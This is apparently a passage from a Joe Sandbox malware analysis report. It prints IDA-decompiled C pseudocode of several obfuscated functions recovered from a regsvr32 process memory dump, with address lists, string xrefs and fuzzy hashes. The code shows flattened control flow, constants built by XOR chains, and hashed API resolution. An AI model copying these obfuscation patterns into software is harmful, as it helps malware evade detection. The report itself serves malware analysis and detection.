				_v124 = _v124 ^ 0xdd2f4899;
				_v124 = _v124 ^ 0xdd733dae;
				_v48 = 0x3fdd04;
				_v48 = _v48 + 0xdca9;
				_v48 = _v48 ^ 0x51a2bdec;
				_v48 = _v48 + 0xffffe9fd;
				_v48 = _v48 ^ 0x51eeddfc;
				_v116 = 0x86a662;
				_t532 = 0x3e;
				_t533 = _v156;
				_v116 = _v116 / _t532;
				_v116 = _v116 * 0x73;
				_v116 = _v116 ^ 0x00fd398d;
				_v64 = 0x72f53e;
				_v64 = _v64 + 0x31db;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0xffff6dcd;
				_v64 = _v64 ^ 0x0003149a;
				while(1) {
					_t508 = 0x2e;
					L2:
					while(_t460 != 0x9b6cb5) {
						if(_t460 == 0x44804ea) {
							__eflags = _v820 & _v152;
							if(__eflags == 0) {
								_t445 =  *_t534( &_v820,  &_v228);
								asm("sbb ecx, ecx");
								_t460 = ( ~_t445 & 0xfb5d1634) + 0x53e5681;
								while(1) {
									_t508 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v776 - _t508;
							if(_v776 != _t508) {
								L18:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v28);
									_push(_v68);
									_push(_v72);
									E040F2D0A(_v84, __eflags,  &_v776, _v76, _v36, _v60, E040D16DC,  &_v1860, _t458, E040EE1F8(E040D16DC, _v148, __eflags));
									E040E437A(_v156, _v24, _v16, _v100, _v92, _a16, _a20,  &_v1860);
									_t447 = E040EFECB(_t452, _v140, _v108, _v40, _v32);
									_t534 = _v156;
									_t538 = _t538 + 0x50;
									_t508 = 0x2e;
								}
								L17:
								_t460 = 0x9b6cb5;
								continue;
							}
							__eflags = _v774;
							if(__eflags == 0) {
								goto L17;
							}
							__eflags = _v774 - _t508;
							if(_v774 != _t508) {
								goto L18;
							}
							__eflags = _v772;
							if(__eflags != 0) {
								goto L18;
							}
							goto L17;
						}
						if(_t460 == 0x481089e) {
							_t447 = E040E2DA7( &_v820, _v88, _v136,  &_v1340);
							_t533 = _t447;
							__eflags = _t447 - 0xffffffff;
							if(__eflags == 0) {
								return _t447;
							}
							_t460 = 0x44804ea;
							while(1) {
								_t508 = 0x2e;
								goto L2;
							}
						}
						if(_t460 == 0x53e5681) {
							return E040DBEA1(_v116, _v64, _t533);
						}
						if(_t460 == 0xeb5715f) {
							_push(_v104);
							_push(_v96);
							_push(_v80);
							E040E2C9C(_v12, __eflags, E040EE1F8(0x40d167c, _v120, __eflags),  &_v1340, 0x40d167c, _v112, _t458);
							_t447 = E040EFECB(_t449, _v44, _v20, _v144, _v52);
							_t534 = _v156;
							_t538 = _t538 + 0x2c;
							_t460 = 0x481089e;
							while(1) {
								_t508 = 0x2e;
								goto L2;
							}
						}
						if(_t460 != 0xf0aa094) {
							L24:
							__eflags = _t460 - 0x41075ad;
							if(__eflags != 0) {
								continue;
							}
							return _t447;
						}
						_v168 = _t458;
						_t460 = 0xeb5715f;
					}
					_t441 = E040F0F1E(_v56, _v132,  &_v820, _v124, _v48, _t533);
					_t538 = _t538 + 0x10;
					__eflags = _t441;
					if(__eflags != 0) {
						_t460 = 0x44804ea;
						_t508 = 0x2e;
						goto L24;
					}
					_t460 = 0x53e5681;
				}
			}

0x040e4384
0x040e4389
0x040e438a
0x040e438d
0x040e438f
0x040e4392
0x040e4398
0x040e439b
0x040e439e
0x040e43a1
0x040e43a2
0x040e43a3
0x040e43a8
0x040e43b2
0x040e43be
0x040e43c5
0x040e43c6
0x040e43cc
0x040e43d6
0x040e43dd
0x040e43e4
0x040e43eb
0x040e43f8
0x040e43fb
0x040e4402
0x040e4409
0x040e4414
0x040e441e
0x040e4421
0x040e4428
0x040e4432
0x040e4437
0x040e443c
0x040e4440
0x040e4447
0x040e4451
0x040e4456
0x040e445b
0x040e4462
0x040e446c
0x040e4471
0x040e4476
0x040e447a
0x040e447e
0x040e4485
0x040e448c
0x040e4490
0x040e4497
0x040e449e
0x040e44a5
0x040e44af
0x040e44b2
0x040e44b5
0x040e44b9
0x040e44c0
0x040e44ce
0x040e44d3
0x040e44d8
0x040e44dc
0x040e44e3
0x040e44ea
0x040e44fb
0x040e44fe
0x040e4504
0x040e450e
0x040e4515
0x040e451c
0x040e4523
0x040e4527
0x040e452e
0x040e4535
0x040e4538
0x040e453f
0x040e4546
0x040e4550
0x040e455a
0x040e4564
0x040e456e
0x040e4578
0x040e4582
0x040e4589
0x040e458d
0x040e4594
0x040e459b
0x040e45a9
0x040e45ac
0x040e45b0
0x040e45b7
0x040e45be
0x040e45c5
0x040e45cc
0x040e45d3
0x040e45da
0x040e45e4
0x040e45e9
0x040e45f1
0x040e45f6
0x040e45fe
0x040e4601
0x040e4604
0x040e460b
0x040e4612
0x040e4619
0x040e461d
0x040e4624
0x040e462b
0x040e4633
0x040e4636
0x040e463d
0x040e4644
0x040e464b
0x040e464f
0x040e4656
0x040e465d
0x040e4664
0x040e466d
0x040e4674
0x040e4678
0x040e467f
0x040e4686
0x040e468d
0x040e4691
0x040e4698
0x040e469f
0x040e46ab
0x040e46b0
0x040e46b3
0x040e46ba
0x040e46c1
0x040e46c8
0x040e46cf
0x040e46d3
0x040e46da
0x040e46e1
0x040e46ed
0x040e46f2
0x040e46f5
0x040e46fc
0x040e4703
0x040e470d
0x040e4714
0x040e471e
0x040e4725
0x040e4729
0x040e472d
0x040e4734
0x040e473b
0x040e473f
0x040e4746
0x040e474a
0x040e4751
0x040e475e
0x040e4768
0x040e476f
0x040e4772
0x040e4775
0x040e477c
0x040e4783
0x040e478a
0x040e4795
0x040e4798
0x040e479f
0x040e47a6
0x040e47ad
0x040e47b4
0x040e47bb
0x040e47c2
0x040e47c9
0x040e47d0
0x040e47d7
0x040e47de
0x040e47e5
0x040e47ec
0x040e47f6
0x040e47f9
0x040e47ff
0x040e4806
0x040e4809
0x040e4810
0x040e4817
0x040e481e
0x040e4822
0x040e4829
0x040e4830
0x040e4832
0x00000000
0x040e4833
0x040e4845
0x040e491b
0x040e4921
0x040e49f9
0x040e49ff
0x040e4a07
0x040e4830
0x040e4832
0x00000000
0x040e4832
0x040e4830
0x040e4927
0x040e492e
0x040e4957
0x040e4957
0x040e495b
0x040e495d
0x040e4965
0x040e4968
0x040e499b
0x040e49bf
0x040e49d5
0x040e49da
0x040e49e0
0x040e49e5
0x040e49e5
0x040e494d
0x040e494d
0x00000000
0x040e494d
0x040e4930
0x040e4938
0x00000000
0x00000000
0x040e493a
0x040e4941
0x00000000
0x00000000
0x040e4943
0x040e494b
0x00000000
0x00000000
0x00000000
0x040e494b
0x040e4851
0x040e48f9
0x040e48fe
0x040e4902
0x040e4905
0x040e4a65
0x040e4a65
0x040e490b
0x040e4830
0x040e4832
0x00000000
0x040e4832
0x040e4830
0x040e485d
0x00000000
0x040e4a5e
0x040e4869
0x040e4884
0x040e488c
0x040e488f
0x040e48b2
0x040e48cb
0x040e48d0
0x040e48d6
0x040e48d9
0x040e4830
0x040e4832
0x00000000
0x040e4832
0x040e4830
0x040e4871
0x040e4a44
0x040e4a44
0x040e4a4a
0x00000000
0x00000000
0x00000000
0x040e4a4a
0x040e4877
0x040e487d
0x040e487d
0x040e4a26
0x040e4a2b
0x040e4a2e
0x040e4a30
0x040e4a3e
0x040e4a43
0x00000000
0x040e4a43
0x040e4a32
0x040e4a32

Strings

#[y,, xrefs: 040E45D3
7S, xrefs: 040E469F
3;+, xrefs: 040E44EA
#`, xrefs: 040E453F

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #`$#[y,$3;+$7S
API String ID: 0-3740457175
Opcode ID: 980e43b1ec2e0678d88a7746b09a3bf5439fa7bd84e8735259bc863fb9c7b4c2
Instruction ID: a002215dfbb8ad9ecfc80be17dfbbc4efee4309f53ef6546e47a8b65658e2339
Opcode Fuzzy Hash: 980e43b1ec2e0678d88a7746b09a3bf5439fa7bd84e8735259bc863fb9c7b4c2
Instruction Fuzzy Hash: 3A124571D00218DFDF68CFA6D989AEEBBB2FB44318F248159D115BB260D7B05A96CF40

Uniqueness

Uniqueness Score: -1.00%

Function 040F00EF, Relevance: 5.3, Strings: 4, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E040F00EF(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				unsigned int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _t303;
				void* _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t370;
				signed int* _t373;

				_t373 =  &_v1692;
				_v1576 = 0xe8da59;
				asm("stosd");
				_t316 = __ecx;
				_t318 = 0x5a;
				asm("stosd");
				_t370 = 0x219adc7;
				asm("stosd");
				_v1592 = 0x4cba20;
				_v1592 = _v1592 / _t318;
				_v1592 = _v1592 ^ 0x000e53d2;
				_v1660 = 0x37da44;
				_v1660 = _v1660 | 0x897b84ec;
				_v1660 = _v1660 >> 7;
				_v1660 = _v1660 ^ 0x011e0d16;
				_v1628 = 0x1c89a1;
				_v1628 = _v1628 | 0x8af6c41c;
				_v1628 = _v1628 ^ 0x8af282b8;
				_v1684 = 0xdb2dca;
				_v1684 = _v1684 | 0x5a04171c;
				_t319 = 0xb;
				_v1684 = _v1684 * 0x1a;
				_v1684 = _v1684 >> 0xb;
				_v1684 = _v1684 ^ 0x000c87cc;
				_v1676 = 0x832ed6;
				_v1676 = _v1676 / _t319;
				_t320 = 5;
				_v1676 = _v1676 / _t320;
				_v1676 = _v1676 ^ 0xed35e4ac;
				_v1676 = _v1676 ^ 0xed379c5b;
				_v1616 = 0xcbfb93;
				_v1616 = _v1616 >> 7;
				_v1616 = _v1616 ^ 0x000d5997;
				_v1688 = 0xe655f9;
				_v1688 = _v1688 + 0xffff9882;
				_t321 = 0x2b;
				_v1688 = _v1688 * 0xb;
				_v1688 = _v1688 * 0x5b;
				_v1688 = _v1688 ^ 0x83159ef1;
				_v1692 = 0xaa6b82;
				_v1692 = _v1692 | 0xcfd3fae0;
				_v1692 = _v1692 / _t321;
				_v1692 = _v1692 * 0x7a;
				_v1692 = _v1692 ^ 0x4e1b8b3c;
				_v1644 = 0x70af24;
				_v1644 = _v1644 << 5;
				_v1644 = _v1644 | 0xf364d4b3;
				_v1644 = _v1644 ^ 0xff7a96be;
				_v1668 = 0x4a582b;
				_v1668 = _v1668 * 0x66;
				_v1668 = _v1668 << 0xf;
				_v1668 = _v1668 ^ 0x909bc222;
				_v1636 = 0x31215f;
				_v1636 = _v1636 ^ 0x6923b039;
				_t322 = 0x29;
				_v1636 = _v1636 / _t322;
				_v1636 = _v1636 ^ 0x029cf3aa;
				_v1652 = 0x9b2524;
				_t323 = 0x38;
				_v1652 = _v1652 / _t323;
				_v1652 = _v1652 ^ 0x48c3dfd8;
				_v1652 = _v1652 ^ 0x48c1ce16;
				_v1608 = 0x82759;
				_v1608 = _v1608 >> 9;
				_v1608 = _v1608 ^ 0x000ff1e7;
				_v1580 = 0x9cb9ac;
				_v1580 = _v1580 + 0xffffe541;
				_v1580 = _v1580 ^ 0x0099fe2e;
				_v1648 = 0xf0b12f;
				_v1648 = _v1648 >> 3;
				_v1648 = _v1648 >> 0xc;
				_v1648 = _v1648 ^ 0x000b1180;
				_v1680 = 0x5a67b4;
				_t324 = 0x1f;
				_v1680 = _v1680 / _t324;
				_t325 = 0x30;
				_v1680 = _v1680 * 0x62;
				_v1680 = _v1680 / _t325;
				_v1680 = _v1680 ^ 0x000c0a94;
				_v1656 = 0x7af90a;
				_v1656 = _v1656 >> 0x10;
				_v1656 = _v1656 ^ 0xd48e11dc;
				_v1656 = _v1656 ^ 0xd48f85db;
				_v1664 = 0xc7c49c;
				_v1664 = _v1664 ^ 0x0b3147da;
				_v1664 = _v1664 ^ 0x91b20725;
				_v1664 = _v1664 ^ 0x9a45c1a7;
				_v1584 = 0x3444f6;
				_v1584 = _v1584 << 2;
				_v1584 = _v1584 ^ 0x00d71217;
				_v1624 = 0x130de1;
				_t326 = 0x58;
				_v1624 = _v1624 / _t326;
				_v1624 = _v1624 ^ 0x000fc6c7;
				_v1588 = 0xc870d9;
				_v1588 = _v1588 >> 7;
				_v1588 = _v1588 ^ 0x00060dd4;
				_v1600 = 0xa62b50;
				_v1600 = _v1600 | 0x0b3ea590;
				_v1600 = _v1600 ^ 0x0bb32963;
				_v1640 = 0x5829fa;
				_v1640 = _v1640 >> 0x10;
				_v1640 = _v1640 * 7;
				_v1640 = _v1640 ^ 0x000c8c8e;
				_v1620 = 0x9954e5;
				_v1620 = _v1620 | 0x46050794;
				_v1620 = _v1620 ^ 0x46999c00;
				_v1672 = 0x8b6b4f;
				_v1672 = _v1672 ^ 0x051743d3;
				_v1672 = _v1672 + 0x5fbf;
				_v1672 = _v1672 * 0x44;
				_v1672 = _v1672 ^ 0x7d983568;
				_v1596 = 0x4b105f;
				_v1596 = _v1596 ^ 0x074c3e20;
				_v1596 = _v1596 ^ 0x0709a291;
				_v1632 = 0x867cf1;
				_v1632 = _v1632 + 0x5758;
				_v1632 = _v1632 << 0xb;
				_v1632 = _v1632 ^ 0x36a3bfa7;
				_v1604 = 0x1e01e;
				_t327 = 0x6d;
				_v1604 = _v1604 / _t327;
				_v1604 = _v1604 ^ 0x000451f9;
				_v1612 = 0x51328f;
				_t328 = 0x66;
				_t303 = _v1612 / _t328;
				_v1612 = _t303;
				_v1612 = _v1612 ^ 0x000ccfe8;
				while(_t370 != 0x219adc7) {
					if(_t370 == 0x472b880) {
						_push(_t328);
						__eflags = 0;
						return E040E85FF(_v1596, _v1632, 0, 0, 0,  &_v1560, _v1604, 0, _v1612);
					}
					_t379 = _t370 - 0x6430241;
					if(_t370 != 0x6430241) {
						L7:
						__eflags = _t370 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t303;
						}
						L10:
						return _t303;
					}
					E040F0DB1(_v1592,  &_v1040, _t379, _v1660, _t328, _v1628);
					 *((short*)(E040E09DD(_v1684,  &_v1040, _v1676, _v1616))) = 0;
					E040DBAA9(_v1688, _v1692, _t379, _v1644, _v1668,  &_v520);
					_push(_v1580);
					_push(_v1608);
					_push(_v1652);
					E040F2D0A(_v1680, _t379,  &_v520, _v1656, _v1664, _v1584, 0x40d18bc,  &_v1560,  &_v1040, E040EE1F8(0x40d18bc, _v1636, _t379));
					E040EFECB(_t310, _v1624, _v1588, _v1600, _v1640);
					_t328 = _v1620;
					_t303 = E040DBFBE( &_v1560, _t316, _v1672);
					_t373 =  &(_t373[0x18]);
					if(_t303 != 0) {
						_t370 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t370 = 0x6430241;
				goto L7;
			}

0x040f00ef
0x040f00f5
0x040f010c
0x040f010d
0x040f0111
0x040f0114
0x040f0115
0x040f011a
0x040f011b
0x040f012b
0x040f012f
0x040f0137
0x040f013f
0x040f0147
0x040f014c
0x040f0154
0x040f015c
0x040f0164
0x040f016c
0x040f0174
0x040f0181
0x040f0184
0x040f0188
0x040f018d
0x040f0195
0x040f01a5
0x040f01ad
0x040f01b2
0x040f01b8
0x040f01c0
0x040f01c8
0x040f01d0
0x040f01d5
0x040f01dd
0x040f01e5
0x040f01f2
0x040f01f3
0x040f01fc
0x040f0200
0x040f0208
0x040f0210
0x040f021e
0x040f0227
0x040f022b
0x040f0233
0x040f023b
0x040f0240
0x040f0248
0x040f0250
0x040f025d
0x040f0261
0x040f0266
0x040f026e
0x040f0276
0x040f0286
0x040f028b
0x040f0291
0x040f0299
0x040f02a5
0x040f02aa
0x040f02b0
0x040f02b8
0x040f02c0
0x040f02c8
0x040f02cd
0x040f02d5
0x040f02e0
0x040f02eb
0x040f02f6
0x040f02fe
0x040f0303
0x040f0308
0x040f0310
0x040f031c
0x040f0321
0x040f032c
0x040f032f
0x040f033b
0x040f033f
0x040f0347
0x040f034f
0x040f0354
0x040f035c
0x040f0364
0x040f036c
0x040f0374
0x040f037c
0x040f0384
0x040f038f
0x040f0397
0x040f03a2
0x040f03ae
0x040f03b1
0x040f03b5
0x040f03bd
0x040f03c5
0x040f03ca
0x040f03d2
0x040f03da
0x040f03e2
0x040f03ea
0x040f03f2
0x040f03fc
0x040f0400
0x040f0408
0x040f0410
0x040f0418
0x040f0420
0x040f0428
0x040f0430
0x040f043d
0x040f0441
0x040f0449
0x040f0451
0x040f045b
0x040f0468
0x040f0475
0x040f047d
0x040f0482
0x040f048a
0x040f0498
0x040f049d
0x040f04a3
0x040f04ab
0x040f04b7
0x040f04b8
0x040f04ba
0x040f04be
0x040f04c6
0x040f04d4
0x040f05e9
0x040f05ee
0x00000000
0x040f060f
0x040f04da
0x040f04dc
0x040f05db
0x040f05db
0x040f05e1
0x00000000
0x00000000
0x00000000
0x00000000
0x040f061c
0x040f061c
0x040f061c
0x040f04f9
0x040f0518
0x040f0533
0x040f0538
0x040f0544
0x040f054b
0x040f058e
0x040f05ae
0x040f05b7
0x040f05c6
0x040f05cb
0x040f05d0
0x040f05d2
0x00000000
0x040f05d2
0x00000000
0x040f05d0
0x040f05d9
0x00000000

Strings

_!1, xrefs: 040F026E
+XJ, xrefs: 040F0250
XW, xrefs: 040F0475
$P, xrefs: 040F0101

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$+XJ$XW$_!1
API String ID: 0-3524045022
Opcode ID: 0fc6e271b4573aa02be919c2ab83639edfd8c6430f184a3e89ad764b424be27c
Instruction ID: 64f56053bc99f55cd3e9a18d35da583b11b047e7bfdc1b50f6b76e2022145c2e
Opcode Fuzzy Hash: 0fc6e271b4573aa02be919c2ab83639edfd8c6430f184a3e89ad764b424be27c
Instruction Fuzzy Hash: 58D101715093809FD368CF25C94AA5BFBF2FBC4748F108A1DF6999A260D7B19908CF42

Uniqueness

Uniqueness Score: -1.00%

Function 040D80C0, Relevance: 5.3, Strings: 4, Instructions: 261
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E040D80C0(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				unsigned int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				void* _t254;
				void* _t262;
				intOrPtr _t274;
				intOrPtr _t275;
				intOrPtr* _t276;
				void* _t301;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t315;
				intOrPtr _t318;
				signed int* _t319;

				_t276 = __ecx;
				_t319 =  &_v224;
				_v180 = 0xc71c90;
				_v180 = _v180 * 0x55;
				_t315 = 0xb85ea37;
				_v180 = _v180 + 0xffff2ba7;
				_v180 = _v180 ^ 0x4211e203;
				_v140 = 0x3ad325;
				_v140 = _v140 ^ 0x295262d9;
				_v140 = _v140 ^ 0x29635001;
				_v136 = 0xed3dcc;
				_t307 = 0x6e;
				_v172 = __ecx;
				_v136 = _v136 * 0x41;
				_v136 = _v136 ^ 0x3c3e3c90;
				_v168 = 0x802272;
				_v168 = _v168 + 0x3a4b;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0009cc0d;
				_v144 = 0x950525;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 ^ 0x0000417f;
				_v132 = 0xde9c46;
				_v132 = _v132 | 0x6a28fd38;
				_v132 = _v132 ^ 0x6afd2d29;
				_v152 = 0x89fdc2;
				_v152 = _v152 + 0xffff27d1;
				_v152 = _v152 / _t307;
				_v152 = _v152 ^ 0x00002723;
				_v208 = 0xb8ba68;
				_t308 = 0x59;
				_v208 = _v208 / _t308;
				_v208 = _v208 | 0x82dd863f;
				_t309 = 0x24;
				_v208 = _v208 / _t309;
				_v208 = _v208 ^ 0x03ab2b52;
				_v200 = 0x881ce0;
				_t310 = 0x22;
				_v200 = _v200 / _t310;
				_v200 = _v200 >> 6;
				_v200 = _v200 + 0x7e14;
				_v200 = _v200 ^ 0x000ee7c7;
				_v216 = 0xe9a9fc;
				_v216 = _v216 >> 0xa;
				_v216 = _v216 * 0x7c;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0x000159fc;
				_v148 = 0xc6b5e0;
				_v148 = _v148 >> 8;
				_v148 = _v148 ^ 0x0008baff;
				_v192 = 0x70df9a;
				_v192 = _v192 | 0xc7ad4485;
				_v192 = _v192 << 0xe;
				_v192 = _v192 * 0x6c;
				_v192 = _v192 ^ 0x95ca127f;
				_v164 = 0x9f9928;
				_v164 = _v164 + 0x9182;
				_v164 = _v164 | 0x4431d27d;
				_v164 = _v164 ^ 0x44b31704;
				_v156 = 0x8a7155;
				_v156 = _v156 ^ 0x4b85dc4d;
				_v156 = _v156 << 3;
				_v156 = _v156 ^ 0x587c4d22;
				_v184 = 0xc4c18b;
				_v184 = _v184 ^ 0x011789e6;
				_v184 = _v184 | 0x4a7cbaeb;
				_v184 = _v184 ^ 0x4bf1fe8b;
				_v160 = 0x793715;
				_v160 = _v160 | 0xbf52a4ae;
				_v160 = _v160 ^ 0x0f7ea677;
				_v160 = _v160 ^ 0xb008de62;
				_v212 = 0x3fdf0f;
				_v212 = _v212 + 0xffffd1fd;
				_t311 = 7;
				_t318 = _v172;
				_v212 = _v212 * 0x1c;
				_v212 = _v212 >> 5;
				_v212 = _v212 ^ 0x0033b954;
				_v220 = 0x4e6c7b;
				_v220 = _v220 >> 4;
				_t275 = _v172;
				_v220 = _v220 / _t311;
				_v220 = _v220 + 0x72d0;
				_v220 = _v220 ^ 0x000bd6ae;
				_v176 = 0xb64387;
				_v176 = _v176 + 0xffff3763;
				_v176 = _v176 >> 0x10;
				_v176 = _v176 ^ 0x000cc814;
				_v224 = 0xc05028;
				_v224 = _v224 + 0xffff6137;
				_v224 = _v224 >> 1;
				_v224 = _v224 ^ 0x7bfc229c;
				_v224 = _v224 ^ 0x7ba9fc4e;
				_v188 = 0xb7ebf2;
				_v188 = _v188 >> 9;
				_v188 = _v188 ^ 0x513bd66b;
				_t312 = 0x35;
				_v188 = _v188 * 0x6b;
				_v188 = _v188 ^ 0xf3ed84ff;
				_v196 = 0x918e67;
				_v196 = _v196 >> 0xb;
				_v196 = _v196 / _t312;
				_t313 = 0x12;
				_t314 = _v172;
				_v196 = _v196 / _t313;
				_v196 = _v196 ^ 0x000cd5f1;
				_v204 = 0xbd465b;
				_v204 = _v204 ^ 0x40a0ad4b;
				_v204 = _v204 * 0x5a;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x022df88e;
				while(1) {
					L1:
					_t254 = 0x58c5d57;
					do {
						while(_t315 != 0x26b32e) {
							if(_t315 == _t254) {
								_push(_v160);
								_push(_v184);
								_push(_v156);
								_t262 = E040EE1F8(0x40d1738, _v164, __eflags);
								_push(_t314);
								_push( &_v128);
								_push(_t262);
								_push(_t318);
								_push(_t275);
								 *((intOrPtr*)(E040F31AA(0xb00b1257, 0x44)))();
								E040EFECB(_t262, _v212, _v220, _v176, _v224);
								_t319 =  &(_t319[0xb]);
								_t315 = 0x5b11858;
								goto L12;
							} else {
								if(_t315 == 0x5b11858) {
									E040F2B09(_v188, _t314, _v196, _v204);
								} else {
									if(_t315 == 0xa9c05ca) {
										_t314 = E040F0A64( *((intOrPtr*)(_t276 + 4)),  *_t276, _v152, _v208);
										__eflags = _t314;
										if(__eflags != 0) {
											_t315 = 0xed0de4e;
											L12:
											_t276 = _v172;
											goto L1;
										}
									} else {
										if(_t315 == 0xb85ea37) {
											_t315 = 0x26b32e;
											continue;
										} else {
											if(_t315 != 0xed0de4e) {
												goto L15;
											} else {
												_t318 = 0x4000;
												_push(_t276);
												_push(_t276);
												_t274 = E040DC5D8(0x4000);
												_t276 = _v172;
												_t275 = _t274;
												_t319 =  &(_t319[3]);
												_t254 = 0x58c5d57;
												_t315 =  !=  ? 0x58c5d57 : 0x5b11858;
												continue;
											}
										}
									}
								}
							}
							L18:
							return _t275;
						}
						_push(_t276);
						_push(_t276);
						_t318 = E040ECCA0(1, 0x10);
						_push( &_v128);
						_push(_t318);
						_push(_v132);
						_t301 = 0xb;
						E040DE404(_v144, _t301);
						_t276 = _v172;
						_t319 =  &(_t319[7]);
						_t315 = 0xa9c05ca;
						_t254 = 0x58c5d57;
						L15:
						__eflags = _t315 - 0x7f64d40;
					} while (__eflags != 0);
					goto L18;
				}
			}

0x040d80c0
0x040d80c0
0x040d80c6
0x040d80d9
0x040d80dd
0x040d80e2
0x040d80ea
0x040d80f2
0x040d80fa
0x040d8102
0x040d810a
0x040d8119
0x040d811c
0x040d8120
0x040d8124
0x040d812c
0x040d8134
0x040d813c
0x040d8141
0x040d8149
0x040d8151
0x040d8156
0x040d815e
0x040d8166
0x040d816e
0x040d8176
0x040d817e
0x040d818e
0x040d8192
0x040d819a
0x040d81a6
0x040d81ab
0x040d81b1
0x040d81bd
0x040d81c2
0x040d81c8
0x040d81d0
0x040d81dc
0x040d81df
0x040d81e3
0x040d81e8
0x040d81f0
0x040d81f8
0x040d8200
0x040d820a
0x040d820e
0x040d8213
0x040d821b
0x040d8223
0x040d8228
0x040d8230
0x040d8238
0x040d8240
0x040d824a
0x040d824e
0x040d8256
0x040d825e
0x040d8266
0x040d826e
0x040d8276
0x040d8280
0x040d8288
0x040d828d
0x040d8295
0x040d829d
0x040d82a5
0x040d82ad
0x040d82b5
0x040d82bd
0x040d82c5
0x040d82cd
0x040d82d5
0x040d82dd
0x040d82ec
0x040d82ef
0x040d82f3
0x040d82f7
0x040d82fc
0x040d8304
0x040d830c
0x040d8319
0x040d831d
0x040d8321
0x040d8329
0x040d8331
0x040d8339
0x040d8341
0x040d8346
0x040d834e
0x040d8356
0x040d835e
0x040d8362
0x040d836a
0x040d8372
0x040d837a
0x040d837f
0x040d838c
0x040d838f
0x040d8393
0x040d839b
0x040d83a3
0x040d83b0
0x040d83b8
0x040d83bb
0x040d83bf
0x040d83c3
0x040d83cb
0x040d83d3
0x040d83e0
0x040d83e4
0x040d83e9
0x040d83f1
0x040d83f1
0x040d83f1
0x040d83f6
0x040d83f6
0x040d8404
0x040d849c
0x040d84a5
0x040d84a9
0x040d84b1
0x040d84c4
0x040d84c5
0x040d84c6
0x040d84c7
0x040d84c8
0x040d84d1
0x040d84e5
0x040d84ea
0x040d84ed
0x00000000
0x040d840a
0x040d8410
0x040d855a
0x040d8416
0x040d841c
0x040d8482
0x040d8486
0x040d8488
0x040d848e
0x040d8493
0x040d8493
0x00000000
0x040d8493
0x040d841e
0x040d8424
0x040d8469
0x00000000
0x040d8426
0x040d842c
0x00000000
0x040d8432
0x040d8436
0x040d8447
0x040d8448
0x040d844a
0x040d844f
0x040d8453
0x040d8455
0x040d845f
0x040d8464
0x00000000
0x040d8464
0x040d842c
0x040d8424
0x040d841c
0x040d8410
0x040d8564
0x040d856d
0x040d856d
0x040d8504
0x040d8505
0x040d850f
0x040d8518
0x040d8519
0x040d851a
0x040d8527
0x040d8528
0x040d852d
0x040d8531
0x040d8534
0x040d8539
0x040d853e
0x040d853e
0x040d853e
0x00000000
0x040d854a

Strings

{lN, xrefs: 040D8304
#', xrefs: 040D8192
K:, xrefs: 040D8134
"M|X, xrefs: 040D828D

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "M|X$#'$K:${lN
API String ID: 0-1886388755
Opcode ID: 2b68ab050719d083ea957e17747c7f10d8d8287f08eada181ccd4e093e579d33
Instruction ID: 77dd8708cb07626e05522aa5741b05deced86ed01978b8c0e0744d2be5c3008e
Opcode Fuzzy Hash: 2b68ab050719d083ea957e17747c7f10d8d8287f08eada181ccd4e093e579d33
Instruction Fuzzy Hash: 8DC142725083809FC358DF26C48A90BFBE1FBD4758F50891DFAA5A6260D3B5E949CF42

Uniqueness

Uniqueness Score: -1.00%

